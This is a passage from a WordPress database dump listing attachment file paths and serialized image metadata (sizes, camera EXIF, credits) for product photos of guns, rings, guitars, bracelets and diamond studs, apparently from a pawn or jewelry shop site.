e\";s:33:\"Gold_Diamond-Jewelry-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"slider-thumb-orig\";a:4:{s:4:\"file\";s:31:\"Gold_Diamond-Jewelry-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(468,244,'_wp_attached_file','2015/03/gun.jpg'),(469,244,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:15:\"2015/03/gun.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"gun-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"gun-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"gun-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"gun-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"gun-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"gun-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:14:\"gun-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:5;s:6:\"credit\";s:7:\"unknown\";s:6:\"camera\";s:13:\"Canon EOS 20D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1301756373;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"72\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(470,245,'_wp_attached_file','2015/03/ring.jpg'),(471,245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2015/03/ring.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ring-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ring-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"ring-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"ring-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:16:\"ring-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"ring-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:15:\"ring-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:5:\"Kvach\";s:6:\"camera\";s:10:\"PENTAX K-r\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1355698814;s:9:\"copyright\";s:5:\"KVACH\";s:12:\"focal_length\";s:2:\"90\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(472,246,'_wp_attached_file','2015/03/guitar.jpg'),(473,246,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2015/03/guitar.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"guitar-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"guitar-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"guitar-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"guitar-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"guitar-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"guitar-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:17:\"guitar-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:4;s:6:\"credit\";s:10:\"Todd Arena\";s:6:\"camera\";s:13:\"Canon EOS 20D\";s:7:\"caption\";s:47:\"A wall with vintage guitars hanging on display.\";s:17:\"created_timestamp\";i:1226188751;s:9:\"copyright\";s:16:\"© by Todd Arena\";s:12:\"focal_length\";s:2:\"25\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:15:\"Vintage Guitars\";s:11:\"orientation\";i:1;}}'),(474,248,'_wp_attached_file','2015/03/North-Lombard.jpg'),(475,248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:25:\"2015/03/North-Lombard.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"North-Lombard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"North-Lombard-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"North-Lombard-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"North-Lombard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"North-Lombard-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"North-Lombard-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:24:\"North-Lombard-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(476,248,'_wp_attachment_image_alt','North Lombard store, all that glitters'),(477,251,'_wp_attached_file','2015/03/guitar-390.jpg'),(478,251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:390;s:4:\"file\";s:22:\"2015/03/guitar-390.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"guitar-390-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"guitar-390-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"guitar-390-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"guitar-390-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"guitar-390-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"guitar-390-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:21:\"guitar-390-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:4;s:6:\"credit\";s:10:\"Todd Arena\";s:6:\"camera\";s:13:\"Canon EOS 20D\";s:7:\"caption\";s:47:\"A wall with vintage guitars hanging on display.\";s:17:\"created_timestamp\";i:1226188751;s:9:\"copyright\";s:16:\"© by Todd Arena\";s:12:\"focal_length\";s:2:\"25\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:15:\"Vintage Guitars\";s:11:\"orientation\";i:1;}}'),(479,252,'_wp_attached_file','2015/03/ring-390.jpg'),(480,252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:390;s:4:\"file\";s:20:\"2015/03/ring-390.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"ring-390-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"ring-390-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"ring-390-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"ring-390-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"ring-390-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"ring-390-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:19:\"ring-390-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:5:\"Kvach\";s:6:\"camera\";s:10:\"PENTAX K-r\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1355698814;s:9:\"copyright\";s:5:\"KVACH\";s:12:\"focal_length\";s:2:\"90\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(481,253,'_wp_attached_file','2015/03/gun-390.jpg'),(482,253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:390;s:4:\"file\";s:19:\"2015/03/gun-390.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"gun-390-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"gun-390-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"gun-390-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"gun-390-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"gun-390-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"gun-390-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:18:\"gun-390-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:5;s:6:\"credit\";s:7:\"unknown\";s:6:\"camera\";s:13:\"Canon EOS 20D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1301756373;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"72\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(483,265,'_wp_attached_file','2015/03/GoldBracelets_1370x400_b.png'),(484,265,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1370;s:6:\"height\";i:400;s:4:\"file\";s:36:\"2015/03/GoldBracelets_1370x400_b.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"GoldBracelets_1370x400_b-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"GoldBracelets_1370x400_b-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"GoldBracelets_1370x400_b-1024x299.png\";s:5:\"width\";i:1024;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"GoldBracelets_1370x400_b-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:36:\"GoldBracelets_1370x400_b-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"GoldBracelets_1370x400_b-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:36:\"GoldBracelets_1370x400_b-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:37:\"GoldBracelets_1370x400_b-1370x400.png\";s:5:\"width\";i:1370;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:35:\"GoldBracelets_1370x400_b-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(485,266,'_wp_attached_file','2015/03/GoldBracelets_1370x400.png'),(486,266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1370;s:6:\"height\";i:400;s:4:\"file\";s:34:\"2015/03/GoldBracelets_1370x400.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"GoldBracelets_1370x400-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"GoldBracelets_1370x400-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"GoldBracelets_1370x400-1024x299.png\";s:5:\"width\";i:1024;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"GoldBracelets_1370x400-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:34:\"GoldBracelets_1370x400-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"GoldBracelets_1370x400-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"GoldBracelets_1370x400-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:35:\"GoldBracelets_1370x400-1370x400.png\";s:5:\"width\";i:1370;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:33:\"GoldBracelets_1370x400-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(487,267,'_wp_attached_file','2015/03/Gold-Bracelets.png'),(488,267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1155;s:6:\"height\";i:1732;s:4:\"file\";s:26:\"2015/03/Gold-Bracelets.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Gold-Bracelets-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Gold-Bracelets-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Gold-Bracelets-683x1024.png\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Gold-Bracelets-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Gold-Bracelets-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"Gold-Bracelets-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Gold-Bracelets-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:27:\"Gold-Bracelets-1155x588.png\";s:5:\"width\";i:1155;s:6:\"height\";i:588;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:25:\"Gold-Bracelets-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(489,268,'_wp_attached_file','2015/03/Diamond-Studs.png'),(490,268,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1370;s:6:\"height\";i:400;s:4:\"file\";s:25:\"2015/03/Diamond-Studs.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Diamond-Studs-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Diamond-Studs-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Diamond-Studs-1024x299.png\";s:5:\"width\";i:1024;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Diamond-Studs-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Diamond-Studs-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Diamond-Studs-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Diamond-Studs-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Diamond-Studs-1370x400.png\";s:5:\"width\";i:1370;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:24:\"Diamond-Studs-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(491,269,'_wp_attached_file','2015/03/Diamond-Studs-300x299.png'),(492,269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:299;s:4:\"file\";s:33:\"2015/03/Diamond-Studs-300x299.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Diamond-Studs-300x299-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Diamond-Studs-300x299-300x299.png\";s:5:\"width\";i:300;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"Diamond-Studs-300x299-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"Diamond-Studs-300x299-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Diamond-Studs-300x299-300x299.png\";s:5:\"width\";i:300;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"Diamond-Studs-300x299-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:32:\"Diamond-Studs-300x299-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(493,272,'_wp_attached_file','2015/03/Lombard_no_table_new_logo_BL-2.jpg'),(494,272,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:42:\"2015/03/Lombard_no_table_new_logo_BL-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"Lombard_no_table_new_logo_BL-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"Lombard_no_table_new_logo_BL-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:40:\"Lombard_no_table_new_logo_BL-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:42:\"Lombard_no_table_new_logo_BL-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:42:\"Lombard_no_table_new_logo_BL-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:42:\"Lombard_no_table_new_logo_BL-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:41:\"Lombard_no_table_new_logo_BL-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:2.7999999999999998;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1425560325;s:9:\"copyright\";s:13:\"© 